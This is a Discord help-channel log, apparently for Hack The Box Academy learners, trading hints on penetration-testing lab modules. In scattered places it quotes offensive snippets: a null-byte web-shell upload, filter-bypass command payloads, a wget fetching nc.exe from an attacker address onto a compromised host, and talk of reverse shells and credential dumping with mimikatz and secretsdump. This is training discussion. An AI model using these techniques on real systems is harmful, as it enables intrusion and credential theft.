#modules

1 messages Β· Page 185 of 1

fathom pendant
#

mom and mom's friend are fighting again

languid dawn
#

oh yeah right

rustic sage
#

Idk even what this server is for

solid python
#

Then why did you join

rustic sage
#

At this point

fathom pendant
languid dawn
#

no but jokes aside, keep it relevant to topic

upper ruin
#

Sigh...I have to impersonate users in sql. That's painful.

languid dawn
fathom pendant
#

i remember this now..

upper ruin
#

Yup.

rustic sage
#

OH

upper ruin
#

Should I do the hard lab?

#

Meh, let's go.

fathom pendant
upper ruin
#

Nah, u will see ima get it this time.

fathom pendant
#

kek the mssql portion... it's a mess

upper ruin
#

Big balls.

fathom pendant
#

it's a whole dang'ol mess

upper ruin
#

lemme get some water and I will sit my ahh down.

rustic sage
#

Can sm help me with this stuff?

fathom pendant
languid dawn
#

gotta ask a real question first to get help

fathom pendant
upper ruin
fathom pendant
#

bringin this classic image back

languid dawn
#

modules in academy literally take you from zero to hero

#

I'm not sure what could possibly confuse you

fathom pendant
fathom pendant
placid edge
#

anyone done that skill assesment that i am talking about

#

like this is weird

languid dawn
fathom pendant
#

it doesn't include any /resource/location

fathom pendant
#

also you added an extra .

placid edge
#

i mean yeah. all the other for other modules with fqdn i've found it

fathom pendant
#

fqdn omits that last .

placid edge
#

its just this one that is giving me issues

fathom pendant
#

haven't done this module so couldn't tell ya

placid edge
#

alr

#

ill save this one then for later

fathom pendant
#

i'm about to go give myself brain damage by pretending to read english composition work

prisma spruce
#

I don't think I've come across any software where the last dot matters, though I did read a hacker news post where the email was something like user@nl and people were confused.

placid edge
#

cant be bothered rn

prisma spruce
fathom pendant
#

does it?

#

i genuinely forget

prisma spruce
#
omitted and the labels are separated by dots (".").  Since a complete
domain name ends with the root label, this leads to a printed form which
ends in a dot.  We use this property to distinguish between:

   - a character string which represents a complete domain name
     (often called "absolute").  For example, "poneria.ISI.EDU."

   - a character string that represents the starting labels of a
     domain name which is incomplete, and should be completed by
     local software using knowledge of the local domain (often
     called "relative").  For example, "poneria" used in the
     ISI.EDU domain.```
#

I don't recall coming across anything where that has mattered.

upper ruin
#

When I was doing the FQDN stuff on the footprinting module in DNS section it did matter.

#

I made the mistake of typing inlanefreight.htb.

#

When it was without the last dot.

fathom pendant
#

^ that's likely what conditioned me

prisma spruce
upper ruin
#

Maybe, can't remember.

#

Oh no...it's a windows host.

fathom pendant
upper ruin
#

i thought u were joking

fathom pendant
#

i was not

upper ruin
#

well shit

fathom pendant
#

i remember the pain

prisma spruce
fathom pendant
#

because it definitely hurt

upper ruin
#

Can't stop HTB CREW No-1

#

!!!

fathom pendant
#

China Numba One

rustic sage
#

verified now

upper ruin
#

Hard lab is easier.

#

Found simons creds.

fathom pendant
upper ruin
#

For now.

fathom pendant
#

it's really just the mssql part that's a pain

#

bc it combines a few of the techniques

upper ruin
#

Meh, can't be that bad.

#

Nice, got the rdp working, time to face the real sh.

placid edge
#

nvr mind

#

i bothered and got it

#

even tho i swear i've tried the same answer before. Prob forgot a space in the answer

placid edge
#

academy should strip the answer string from spaces before the check if its correct or not

#

to many times i've fell for that

steel grail
#

I got the solution for the CRUD API in academy but it says my answer is wrong

#

nvm got it

upper ruin
#

Found the flag.

#

ACS completed 4:40 AM.

#

I am big oof dead

shrewd hazel
#

lost as could be on this one, this should be right

cedar void
#

Not sure why this command isn't working given that I created the ticket.

ls \academy-ea-dc01.inlanefreight.local\c$

" Perform the ExtraSids attack to compromise the parent domain. Submit the contents of the flag.txt file located in the c:\ExtraSids folder on the ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL domain controller in the parent domain. "
https://academy.hackthebox.com/module/143/section/1457

shrewd hazel
#

in host file?

next bronze
steel grail
#

how do i connect to an SMB share?

#

nvm im stupid

sudden pawn
#

Hello, I finished this step

#

I am stuck on the last question. Despite the filtering applied and the different account names found, nothing passesFeelsBadMan

next bronze
sudden pawn
next bronze
#

as user10

sudden pawn
low star
#

Hi, im doing web proxies and working on the /lucky.php question. im using the script while true; do curl -s http://83.136.253.251:54893/lucky.php?getflag=true; done | grep -e htb -e HTB -e { and i know you have to get "lucky" but ive made over 5000 requests so i think im flawed, any hints πŸ˜„ thank you

low star
tranquil axle
#

the -s just removes the progressbar or potential error messages, the content of the website still shows up

#

since its the webproxies module I assume they wanted you to use zaproxy to just resend it automatically a thousand times and then check the response size or something like that? Your script itself looks fine I think

low star
#

I have sent about 10,000 requests

tranquil axle
#

you are not sending the getflag=true in the way that the website does it when you press the button

#

modifying your command to send the request correctly you should get the flag within 2 seconds of it running

low star
wind olive
#

is a bad things if i dont understand everything a 100% yet like servers or internal networks?

#

im a beginner

acoustic owl
runic rampart
#

Good afternoon friends. Can you give me a hint in
Introduction to White Box Penetration Testing: Assessing Skills
I have authenticated and found two potential entry points for "Eval Injection" /ping and /whoami (the program keeps freezing during testing).

regal sigil
#

Hey can anyone help me enumerate the Hostname of a mssql server

#

So far i have tried nmap scripts but got nothing from that

#

I am referring to the MSSQL footprinting module

soft cedar
buoyant escarp
slate gate
#

mine isnt, trying to do the pivoting module

#

wtf lmao

#

im on the second chapter and target wont go up

#

so its not tht i think

fathom pendant
#

the servers tend to shit the bed on the weekends

buoyant escarp
#

meh the Password Attacks module is mostly Windows 😦

snow ridge
#

I have been trying to spawn a target for 15mins now, and I had problems earlier today + yersterday

#

@rustic sage I did that module 2 weeks ago and all the machines went up in like 20 seconds

buoyant escarp
fathom pendant
#

linux comes back

buoyant escarp
#

good

#

omg it spawned after a decade πŸ˜„

fathom pendant
#

@rustic sage ^ you don't see this?

#

message support then? try refreshing the page - logging out and back in

#

yes: green bubble buttom right

#

if you don't see it, you may need to disable ad-block

#

browser theme

#

that theme may also have not shown the target button kek

limber basalt
#

hello...

#

I am trying to hack

#

lol

#

jk jk i am not

fathom pendant
lusty thicket
#

ctrl-v

plain coral
#

Hello everyone, could I please have some guidance on this one? I need to submit the contents of the flag.txt file located on the Administrator Desktop of the SQL01 host. This is part of the AD Enumeration & Attacks - Skills Assessment Part II. I've attempted privilege escalation through PrintSpoofer to establish a named pipe. I used a Meterpreter reverse shell payload, which I uploaded to C:\Users\Public using certutil. This challenge is doing my a** in

fathom pendant
#

pasting into a terminal requires the addition of the shift key

#

works for me

#

if you're using the pwnbox (in-browser vm) you may need to enable clipboard

next bronze
plain coral
#

I'm not getting the shell, might reboot the machine kekhands

heavy mango
#

anyone else having problems spawning targets on modules?

next bronze
heavy mango
#

it's not that I'm not seeing the link to spawn the target, it's just that it won't spawn

next bronze
#

the serverse have been shitting the bed today

snow ridge
#

Yeah, I have been trying to spawn machine for 1 hour now. Restarted VPN, log out/login, nothing works. I guess we just have to wait

#

Im just reviewing other modules now and expanding my notes

heavy mango
#

ah, I see

snow ridge
#

It finally spawned

fathom pendant
snow ridge
#

And it took 1min to do the exercise

winged elm
oblique spoke
#

hi! I am trying to get the shell that i uploaded: ```
Content-Disposition: form-data; name="uploadFile"; filename="shell.php\x00.gif"
Content-Type: image/gif

but than i cant reach from url:/shell.php/x00.gif?cmd=id 
Can anyone help?  \ character always got replaced by / in the url
next bronze
#

if the nullbyte trick worked then the file will simply be uploaded as shell.php

oblique spoke
#

yeah no

#

thats not working

next bronze
#

then you probably need to try something else whatcanisay

oblique spoke
#

yeah thats what i am asking

#

bc this is my first time trying this kind of url and it looks suspicious that this character always change in the browser /

next bronze
#

so what are you asking? if you can't access shell.php then the upload isn't successful

oblique spoke
#

this module is the upload attacks type filters

#

no i changed it to jpg but it was .gif before

snow ridge
#

Just go to "{url}/shell.php"

fathom pendant
oblique spoke
#

cmd=id

#

GET /profile_images/shell.php\x00.gif?cmd=id

#

404 not found

fathom pendant
#

don't include the nullbyte part

#

take out the \x00.gif part

oblique spoke
#

i tried that

ocean matrix
#

I use my voutcher but I cant switch to CPTS, the voutcher stay on CBBH someone know for what?

fathom pendant
#

i'd reach out to support

next bronze
# oblique spoke i tried that

you can see what your file is uploaded as at the main page, like I said, if nullbyte doesn't work, try another way

stoic arrow
#

Module: Cracking Passwords with Hashcat. Section: Cracking wireless... any clue on what im doing wrong?

oblique spoke
#

πŸ˜„

#

well this is not optional

next bronze
#

find another way to make it work, check the whilelist filters section

ocean matrix
fathom pendant
ocean matrix
#

yes I used the voutcher 2 hours ago

fathom pendant
#

then you may need to wait until tomorrow to switch it

#

but that doesn't mean you can't select another path

ocean matrix
fathom pendant
#

there also are no videos on most of the academy content

#

anything above tier 0 is against the rules to upload

ocean matrix
fathom pendant
buoyant escarp
buoyant escarp
stoic arrow
#

||./cap2hccapx.bin ../../Desktop/corp_question1-01.cap ../../Desktop/mic22000.22000||

buoyant escarp
#

I used cap2hashcat online converter, then like you did a 0 m2200 and rockyou

cedar void
next bronze
#

should be the same as the previous section

stoic arrow
cedar void
next bronze
#

I remember the dev said this section is very outdated

stoic arrow
next bronze
#

I'll add it to erratum

unique locust
#

attacking application with ffuf -> Sub-domain fuzzing, someone?

teal breach
#

hello, can someone give me a hint on the advance command obfuscation for bypassing the pipe (|) ? i already tried ||bash<<<$(base64%09-d<<<fA==)|| and ||$(tr%09'!-}'%09'"-~'<<<{)|| but it's not working

unique locust
#

and i get 4 response - www/ns3/blog/support

lusty thicket
teal breach
lusty thicket
lusty thicket
teal breach
buoyant escarp
rich wraith
#

I tried pwncat-cs to catch a reverse shell, but it says ,,channel unexpectedly closed" (its working with netcat)

buoyant escarp
#

i think you are giving hashcat the wrong file

desert cypress
#

Hi, I have a quick question about the ATTACKING COMMON APPLICATIONS for PRTG Network Monitor module. I would like to brute force the password, but it is extremely slow, and I would like to understand why. When I use curl on the /public/login.htm page I get an almost immediate response, but when I try a curl of this type

the response takes a very long time. In addition, with burp, I notice a 302 Moved Temporarily when I test with my repeater.

buoyant escarp
#

i havent done this but maybe follow the 302 by -L

spring sonnet
#

Hi, has anybody currently problems with targets in Academy modules not spawning?

hot grove
#

not by my knowledge so far, ill go ahead and spin up a target real quick

spring sonnet
#

Thanks. Pwnbox works Like a Charm...

hot grove
#

target spawned

spring sonnet
#

Okay, now it started. Seems to be a temporary Thing on my Side. Thanks!

rough flame
#

Can I DM anyone regarding NTLM Relay attacks - skills assessment?

desert cypress
desert cypress
solar pecan
#

hey guys... Do you have problems spawning target machines?

buoyant escarp
#

Password Attacks
PtH
i have problems understanding the question.
do they want me to:

  1. impersonate julian via PtH
  2. spawn powershell via PtH
  3. import Invoke-TheHash, but its already there in C:\tools
  4. make a reverse shell from DC01 to MS01?

am i getting this correct?

spring sonnet
buoyant escarp
desert cypress
buoyant escarp
hot grove
#

might be latencyb issues, pings taking quite some time it looks like

desert cypress
soft cedar
buoyant escarp
#

where comes the username from, svc_workstations? from a scan like mimikatz sekurlsa::logonPasswords?

quiet shuttle
#

Hi Guys , are here Somebody who is really good at Monitoring , need a little Bit Help . Some Guys are Monitoring me For beeing Not normal in they opinion . They siting in the room behind me and read all the Things iam writing on my Phone and have some Videos from me , how is this possible. Antivirus dont find anything. Phone reset dont Work, Change number , Phone , country and so much Things. Where i get to , is it a Projekt or some thing . Iam Not Paranoid.

quiet shuttle
#

These Guys are normal Guys .

#

Go to Work ect.

#

What third eye

sterile epoch
quiet shuttle
#

Serious ?

sterile epoch
quiet shuttle
#

They Trying to Bring me to suicide i think but iam Not doing this ether.

quiet shuttle
#

Everthing they doing is useless

lusty thicket
next bronze
sterile epoch
#

and get help

quiet shuttle
#

Police cant Help iam in Russia perhaps they will so the Same

sterile epoch
#

then maybe its fbi

#

or kgb or beijing

#

are you a spy?

lusty thicket
sterile epoch
#

anyways its not the place to talk about this stuff

#

the lord is watching

quiet shuttle
#

Iam from Germany and they Filmed me there i think , then j Go to Russia and they send all this shit here

sterile epoch
#

dude dont talk here lord putin is watching I wanna be on his good side in case of war

#

we talk about academy stuff here

quiet shuttle
#

Okei

#

Thanks For Help , Nobody knows with what Programm is it possible?

sterile epoch
#

the fathers are well trained in this type of guidance

#

or whatever faith ypu use

#

sorry for assuming

shell oak
#

I'm stuck on the AD Enumeration & Attack Skills assessment 1: I have 3 reverse shells, one is nc, one is metasploit, one to a different machine using metasploit. This is probably unnecessary but I hate loosing shells. I have uploaded 3 different tools to kerberoast the user and none of them work. It is like they dont execute. I cant import-module, katz and rube fail to provide any output. What am I missing? Can someone assist in this?

steel dock
#

Hi everyone. Is there I way I can verify my discord account with my HTB academy account? I checked under #welcome, but I only have HTB Academy, not "plain" HTB

next bronze
#

make an account

shell oak
# next bronze which question

"Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer" is the question.

next bronze
#

one of the ways is to import powerview, but wdym you can't import

languid wharf
#

Hi, when trying to spawn a lab at the end of a section I get stuck on Target is spawning... and it loads forever. Is there a problem with the servers or it's something in my side?

shell oak
# next bronze one of the ways is to import powerview, but wdym you can't import

I type PS C:> import-module .\PowerView.ps1 and it hangs for a second but never imports. If I try any of the functions of PowerView nothing happens. I was able to get the account name using setspn.exe , I can load the ticket into memory, and validate that it is there using klist, but any of the tools I try to dump it fail

languid wharf
snow ridge
#

yeah same for me

#

had wait over 1hr today for machine to spawn

analog dock
buoyant escarp
#

Password Attacks
PtH
last question

i cant get the reverse shell.
||

  1. RDP as julio
  2. start powershell as admin
  3. start powershell as admin for nc listener
  4. import stuff
  5. launch Invoke_WMIExec at target DC01, domain inlanefreight.htb, user julio, hash juliohash, command is base64 powershell for reverseshell at ip 172.16.1.5(MS01)
    ||
shell oak
next bronze
#

use Get-DomainSPNTicket from powerview, if it didn't get imported correctly it will tell you the cmdlet is not found

analog dock
next bronze
#

or mimikatz yes

analog dock
#

Then it was a matter of following section

shell oak
analog dock
#

Like I said I used a revshell

#

Mimikatz worked fine

shell oak
analog dock
#

msfvenom with windows/shell_reverse_tcp payload

#

And output it to an exe

#

Works fine

shell oak
next bronze
#

I mean even Get-DomainSPNTicket will work in the webshell

shell oak
# next bronze I mean even Get-DomainSPNTicket will work in the webshell

PS C:> Rubeus.exe kerberoast /nowrap
PS C:> Get-InstalledModule
PS C:> Get-DomainSPNTicket
PS C:>
PS C:> .\mimikatz_64.exe

PS C:\users\administrator\desktop> c:.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
PS C:\users\administrator\desktop> ls

PS C:\users\administrator\desktop> import-module PowerView.ps1
PS C:\users\administrator\desktop> Get-DomainUser * -spn

none are working

shell oak
soft cedar
upper ruin
#

My lad, you gotta escalate to root.

#

And grab the ticket.

#

It's in the /tmp/

#

Francly svc workstation is in the sudoers list.

#

So yk what to do.

cedar void
#

"Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer. "

I am having trouble finding the user bross. "||raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm||
"

https://academy.hackthebox.com/module/143/section/1508

next bronze
#

you have system on DC, need I say more?

buoyant escarp
#

i use julio

#

but i am not sure why the reverse shell doesnt land on MS01

cedar void
next bronze
#

what did you use to look at the users?

languid wharf
soft cedar
buoyant escarp
#

i think i gonna restart the machine

soft cedar
#

Bet

buoyant escarp
#

look, nothing

shell oak
leaden pond
#

Module: Windows Privilege Escalation
Section: Skills Assessment Part I

I've gotten a reverse shell on the target, but I'm having trouble uploading tools to it. Here is the command I used: wget http://10.10.15.130:8080/nc.exe -UseBasicParsing -OutFile nc.exe

In the window on my attack box where I'm hosting the Python web server, I see the connection from the target (no error messages), but the file does not download (and I don't get any error messages on the target side either).

buoyant escarp
#

http://10,10.15.130:808. there is a comma after the first 10

leaden pond
#

Good catch. That was just a typo on Discord though. I put the command in correctly on the lab.

next bronze
tulip dragon
#

not getting target for couple of days

#

ACTIVE DIRECTORY ENUMERATION & ATTACKS

leaden pond
quiet shuttle
#

Hi Guys , are here Somebody who is really good at Monitoring , need a little Bit Help . Some Guys are Monitoring me For beeing Not normal in they opinion . They siting in the room behind me and read all the Things iam writing on my Phone and have some Videos from me , how is this possible. Antivirus dont find anything. Phone reset dont Work, Change number , Phone , country and so much Things. Where i get to , is it a Projekt or some thing . Iam Not Paranoid.

buoyant escarp
next bronze
leaden pond
#

I landed in a reverse shell on the web server as what I believe is the web server's service account (iis apppool\defaultapppool) in the directory C:\windows\system32\inetsrv. That's the context in which I ran wget.

rustic sage
#

anyone know how long the average -p- scan takes

next bronze
leaden pond
leaden pond
next bronze
#

nah, you can have a shell drop you at /windows/system32 as a standard user, just depends on how the shell is configured

#

always safer to use a global writable dir

leaden pond
next bronze
#

conptyshell

#

most shells will show you error messages, it's only those oneliners that don't

buoyant escarp
#

32mins waiting for pwnbox to spawn xD

#

still nothing 😦

rustic sage
buoyant escarp
rustic sage
#

πŸ˜†

#

is scanning for tcp ports -sT or -sS

buoyant escarp
#

both are TCP

-sT completes the 3 way handshake
-sS is sending SYN and the server sends SYN-ACK or RST (so no complete Handshake)

#

UDP is -sU

rustic sage
#

what's the 3 steps in the handshake?

#

I'm guessing -sS is faster

buoyant escarp
#

there is even an -sA

rustic sage
#

what is the ACK

buoyant escarp
#

acknowledge

rustic sage
#

-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans

buoyant escarp
#

yeah

rustic sage
#

I need tolearn sA, sW, sM

buoyant escarp
#

try the module NMAP

rustic sage
#

I'm on it right now. that's why I asked about the options. My nmap scan is taking to long for my patiance

#

at least I only have 3% to go

#

In a real pentest wouldn't you always use -p-

leaden pond
# next bronze conptyshell

Have you ever run into this error with conptyshell? No matter what keys I enter, it just outputs the prompt over and over.

rustic sage
#

"Perform a full TCP port scan on your target and create an HTML report. Submit the number of the highest port as the answer."

next bronze
cedar void
rustic sage
#

is htb down?

#

the website wont even load

rustic sage
#

keep giving network error

little ledge
#

I have the same issue 😦

#

Hello btw

rustic sage
#

hey g

#

yeah I dont know I am not even able to log in

#

I was doing a lab and my ssh connection cut out

leaden pond
# rustic sage at least I only have 3% to go

Whenever I get a new target, I always run two nmap scans (there may be a better way, but this has never failed me):
sudo nmap -p- -T5 <target>
sudo nmap -A -p[ports output from the above scan] <target>
Adding the -T5 flag to the full tcp scan really speeds it up. There may be reasons this is not a best practice, in which case I hope someone will correct me.

next bronze
#

t5 is fine if your connection to the target is good, I usually use t4

#

for double pivots I'll slow it down even more

cedar void
# next bronze ntds

||ndts.dit? Something similar to this commmand: β€˜/usr/local/bin/secretsdump.py -ntds /home/htb-ac-767577/NTDS.dit -system \Windows\System32\config\SYSTEM’||

leaden pond
next bronze
next bronze
leaden pond
next bronze
#

does the target have internet?

next bronze
leaden pond
indigo locust
#

has anybody been havig issue spawning "Target" machine ?

buoyant escarp
#

yes

next bronze
#

and all targets don't have internet

buoyant escarp
#

im giving up for today, waiting 1:30h for target

indigo locust
#

My page has been loading for +20min which usually takes 30sec max to load

sleek lark
leaden pond
sharp adder
#

Hi, my target never spawn, It keeps there for a while, I reboot my pc but nothing change and my network confg is ok.

ashen night
#

Same here going on 20 mins

sharp adder
#

Well at least now I know that i'm not the only one xd

#

It's working now

ashen night
#

SWeet

verbal tree
#

I'm not sure is this type of questions goes to that channel but i'm starting and i would like to know if starting for the Information Security Foundations it's a good option.

dapper current
#

Here too no target is spawning

verbal tree
sharp adder
cedar void
#

mine did not

sharp adder
#

yep, right now is working well

#

try restarting your pc, maybe it works or at least works for me

misty saddle
limber river
#

what's going on , with the servers today ?

silk tulip
#

borken

buoyant escarp
#

Men cme is such a cool tool

next bronze
#

netexec is cooler

next bronze
#

yep, that's where all the active cme devs are at

limber river
next bronze
#

nope, like I said, that's where all the active cme devs are at

#

I guess you can consider it an alternative that's updated with new features

limber river
buoyant escarp
#

ima have a look on it

thorn urchin
#

literally its the same tool renamed because of drama, and all future updates will be in that fork

buoyant escarp
#

ah ok

calm tapir
#

Need assistance with Password Attacks -Network Services (RDP) I was able to get the username and password but cannot RDP into the target to complete the task.

native turtle
#

can't spawning target of Dynamic Port Forwarding with SSH and SOCKS tunnelling

#

what can I do?

buoyant escarp
#

my machine spawned ❀️

crisp citrus
#

i am on intro to the elastic stack, i click the instance, i spawn the target, but i dont see anything to do with kibana or elastic stack in the instance itself. could anyone help with what i might be doing wrong?

buoyant escarp
#

is it possible that the payload is too long?

fathom pendant
#

though i swear there's a decoding step that needs to happen

buoyant escarp
#

in the example is no decoding big_think

fathom pendant
#

then it could be that your b64 encode is bad?

#

Β―_(ツ)_/Β―

buoyant escarp
#

not sure what could go wrong here

cedar void
#

I went back to my old notes on the NTDS.dit database on how to extract password hashes and the first thing it tells me to do is type this command to copy the c drive: vssadmin CREATE SHADOW /For=C:

But this command doesn't work for my particular machine:

Would I have to try external tools or are there other internal tools that I need to try instead?

https://academy.hackthebox.com/module/143/section/1508

fathom pendant
#

your link shows a different module entirely

#

try doing the commands listed in the section you linked first

cedar void
#

Thats the module that I meant to copy. I tried out all those commands suggested in the section and it lead me to DC machine. I know on the DC machine that it has the ntds.dit ...the directory tree that has all of the systems password hashes

buoyant escarp
#

omg i found the reason why it wont works

fathom pendant
#

there's also lsass and other types of things you can use for password hashes i.e. creating a copy of the SAM/SAVE HKLM

#

dumping the lsass process

buoyant escarp
#

i was in the folder Invoke-TheHash, and i was executing the command with .\Invoke-.....
the .\ was the fault

buoyant escarp
#

omg all these hours

fathom pendant
#

DNS; think what that stands for

#

root.inlanefreight.htb is just the admin (root@inlanefreight.htb) iirc dns uses a . to replace characters

cobalt trench
cobalt trench
fathom pendant
faint rampart
#

Anyone else having issues spawning labs? Doing the Attacking Enterprise Networks Module and its been spawning for minutes.

barren crystal
#

do any modules have cryptography analysis ?

#

outside of like standard brute forcing

ruby finch
#

Hey guys I am going through the Service and Process Management section in the Linux Fundamentals module. I am asked to launch OpenSSH using systemctl start ssh. When I do I get

Authentication is required to start 'ssh.service'.
Multiple identities can be used for authentication:
 1.  Debian (debian)
 2.  ,,, (htb-ac-1137339)
Choose identity to authenticate as (1-2)

What password are they asking for for each option? I tried my account password and the default password for PorrotOS but nothing worked and I get "Failed to start ssh.service: Connection timed out
See system logs and 'systemctl status ssh.service' for details." What should I do ?

steel grail
#

Have you tried something like admin1 or password1?

#

I’m surprised it doesn’t say in the module

fathom pendant
fathom pendant
ruby finch
fathom pendant
#

I also generally suggest using your own VM instead of the pwnbox

#

More control over the environment and versions of tools

ruby finch
#

okay I will do that

flat niche
#

Could anyone give me some hints on ad assessment part 1? I'm looking for the other user with a clear text password.

short hare
primal mesa
#

anyone else doing Windows Priv Esc modules and unable to spawn target?

cedar void
#

I know that I use tools like secretydump.py to extract the hashes from the ndts.dit database...but right now I am having trouble downloading/copying the ndts.dit database to the attacking machine.

vssadmin won't work since thats only available on windows server machines from what I have learned

short hare
short hare
cedar void
#

Is there an easier way to copy a hash value into notepad?

"Hashfile 'ilfreight_asrep' on line 1 ($krb5t...4B024C372D9E07319F47341B871F718C): Signature unmatched
No hashes loaded.
"

narrow nebula
#

Correct me if im wrong guys, But arent source ports above the 49k range?

plain coral
narrow nebula
#

Is there any quicker way to do a scan of all ports -p- an ETA was a few hours, however my power box m(VPN) only has 2 hours of life per day and I need to find a source port for the particular section I am on. Any suggestions?

#

When I do -F it only has 2 ports 22/80. It seems I may need some sort of source port in order to do the NCat Command.

limber river
#

still facing connecting problems with labs ...

midnight galleon
#

Target is spawning for ever

limber river
midnight galleon
limber river
midnight galleon
#

Pwnbox works fine, but targets won't spawn

next bronze
midnight galleon
next bronze
#

switch vpn server

limber river
#

academy 1
academy 2
.....

midnight galleon
#

I don't even use vpn I use pwnbox

limber river
midnight galleon
#

Still, target is spawning

#

What is even the relationship between spawning the target and the Pwnbox anyway

next bronze
#

your vpn sets where the target server, pwnbox automatically switches the vpn

halcyon sphinx
#

Hi. I’m working on Broken Authentication Assessment and I’m stuck. I have the credentials for the support user and the corresponding cookie. I’ve decoded part of the cookie but can’t decode the other part. I’ve tried tampering with the part of the cookie I can control and set it to admin but that failed to give admin rights. I don’t know what to do. Could someone give me a hint?

red kraken
#

I am doing the nmap room in htb academy and for some reason my nmap scans wont go through any suggestions?

red kraken
#

And the target spawning is also very slow any tips to make it faster?

dapper current
snow ridge
#

@red kraken Not really, I have tried many things but the problem is on their servers so we can't really do anything. Hopefully they'll fix this tomorrow

red kraken
tight blade
#

guys i wanna learn hacking can someone teach me 😦

hallow kiln
silent oriole
#

Hi Team, unable to start the target. stuck at Target spawning. Any suggestion?

fading ridge
#

Same

snow ridge
#

@silent oriole No, I have tried many things but the problem is on their servers so we can't really do anything. Hopefully they'll fix this tomorrow.

limber river
dense pewter
#

I've gotten a response:

Hello there,

We are currently experiencing intermittent issues with spawning that is affecting all platforms. In cases where it is possible, switching your VPN region may help, but otherwise please be advised we are working to resolve this issue as quickly as possible.

Please check back on Monday as we expect the issue to have been resolved by then. If it still persists, please feel free to reach back out. 
winged elm
brisk viper
languid wharf
winged elm
languid wharf
#

lol

silver iris
#

I have a dumb question about the "Active Directory Enumeration & Attacks".
I started the enumeration and was looking for records on inlanefreight.com, but couldnt find anything. I remembered from a previos DNS module, that i found a flag, that the module didnt accept at the time. But i wrote the command and response down and still had the flag in my notes. So i just tried to dubmit it and it was correct. Today however when using the same command, i dont get the flag as the aswer.
i just used "dig any inlanefreight.com". Any ideas why its not working this time?

silver iris
#

Because the module asks for it.

fathom pendant
silver iris
#

No 100% .com in the question

fathom pendant
#

What section?

silver iris
#

External Recon and Enumeration Principles

#

I remember in the previous module i did it wrong by using the wrong domain, but this time it asks for .com not .htb

languid wharf
#

not .local?

silver iris
#

"While looking at inlanefreights public records; A flag can be seen. Find the flag and submit it. ( format == HTB{******} ) "

#

Or am i stupid now? πŸ˜„

#

But with .com i got the flag like a week ago

#

I still have the output in my notes

kindred shard
fathom pendant
#

But yeah that's weird

#

But any is a query that may not return anything

silver iris
#

I know, but iΒ΄m still curios why it worked a week ago and now it doesnt. Because the flag from a week ago from .com was accepted as correct answer πŸ˜„

kindred shard
languid wharf
silver iris
fathom pendant
#

Bro the flag is right there

languid wharf
silver iris
#

thats not my question

kindred shard
silver iris
#

my question is, why it worked a week ago and now it dont

fathom pendant
#

Delete this btw

languid wharf
#

I just ran it lol

ruby whale
#

What is the use of --local auth in crackmapexec ?
In AD module (Internal Password Spraying - from Linux) it is given as The --local-auth flag will tell the tool only to attempt to log in one time on each machine which removes any risk of account lockout. Make sure this flag is set so we don't potentially lock out the built-in administrator for the domain
What if the host is not domain joined? Could someone please explain in detail about this?

languid wharf
#

Try to specify a known dns server, remember that this domain isn't on the htb servers but a public one.
You can also view the records of this domain using BGP Toolkit becauase it's a public domain

winged elm
silver iris
#

Sorry got it now. Deactivted my personal VPN and now it worked. Sorry for the confusion πŸ˜„

#

At least i can see that notes are valuable

tepid path
#

Good evening everyone and happy new year I would like to know if it is possible to give cubes to another user on HTB Academy

fathom pendant
#

No

ruby whale
#

Hey everyone, is this the right platform to ask doubts or should I use the HTB forum ?

tepid path
fathom pendant
ruby whale
wild oriole
#

Guys, in CROSS-SITE SCRIPTING (XSS) - Phishing module
When I click on spawn the target button, it's going to loading for ever

Faced the same issue?

fathom pendant
fathom pendant
wild oriole
next bronze
wild oriole
#

Any idea how to address it?

fathom pendant
fathom pendant
ruby whale
wild oriole
fathom pendant
#

The vpn region dictates where the target spawns

#

Meaning changing it updates where it should spawn, you'd just need to download a new vpn file

wild oriole
#

Got you, let me have a try

hallow kiln
#

Can't even imagine what support is gonna come back to Monday lol

next bronze
#

100 cubes each πŸ‘€

#

maybe I should open a ticket kekw

sonic glacier
#

stuck on this question, not sure if I need to crack the password or if I did crack it in other modules : Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

flat niche
flat niche
next bronze
flat niche
#

You mean with mimikatz?

next bronze
#

yep

flat niche
#

I'm using sekurlsa::logonPasswords

next bronze
flat niche
#

Is this the right way?

flat niche
next bronze
#

I don't remember which option it is, but it's in there somewhere

flat niche
#

Thank you so much! I will dig deeper with mimikatz

next bronze
#

why not?

fathom pendant
#

If you mount a drive: it's super easy

wild oriole
next bronze
#

check the link I sent, mount the drive, and you will see a network drive when you open my computer

frozen stone
#

Hello, everyone. Could you please assist me with the "Injection Attacks" assessment?

alpine ridge
#

Anyone else having trouble spawning the academy machines?

narrow nebula
next bronze
hollow lake
midnight galleon
#

In the password attacks module, network services section, is there a way to make crackmapexec only enumerate usernames then passwords or am I stuck with this usernames_wordlist.length Γ— password_wordlist.length number of connections?

#

Msfconsole also seems to be using the same n Γ— m instead of n + m

next bronze
midnight galleon
#

No

#

Try all users with one pass

#

And if one user exist on the system but that pass was wrong it would still alert

next bronze
midnight galleon
#

It will prompt the same output even if the user exist

next bronze
#

I'm not sure what you're trying to say here, send a screenshot maybe

hollow lake
rich light
#

I am doing the ADCS module, but cannot seem to spawn the lab

#

Is there some stability issue currently?

hollow lake
astral inlet
#

same prob here

rich light
#

Even when the box spawns, then I cannot connect to the machine πŸ˜†

astral inlet
#

works now for me

civic dawn
#

works sometime, but if it works i can also connect πŸ˜„

steel grail
#

hi everyone

zealous raptor
#

anyone know how i can get my hackthebox account to show my progress on github, just for employment purposes

cedar forum
#

is there a chat where i can ask for help to try to solve a skill check on a module?

next bronze
zealous raptor
next bronze
steel grail
#

hey i am doing an academy module, "getting started". I am at the section where i have to escalate my privalages to get to the root user, i am at user 2 which is the step required before and am kinda stuck

next bronze
steel grail
#

which command?

#

I need a password or something i think for user 2. im not sure

#

i was able to manage the first one.. should getting into root be similar to user 2?

next bronze
#

nope, use the hint that I gave

steel grail
#

hm

#

ok ill come back in a few after i try that out

cedar forum
#

im stuck on the same module xD but a few sections behind that

steel grail
cedar forum
#

im doing the metasploit exercise, but im having trouble setting the options

steel grail
#

ahhhh iu got u

#

dm me and send pictures

#

ill hint you towards it

cedar forum
#

already did xD

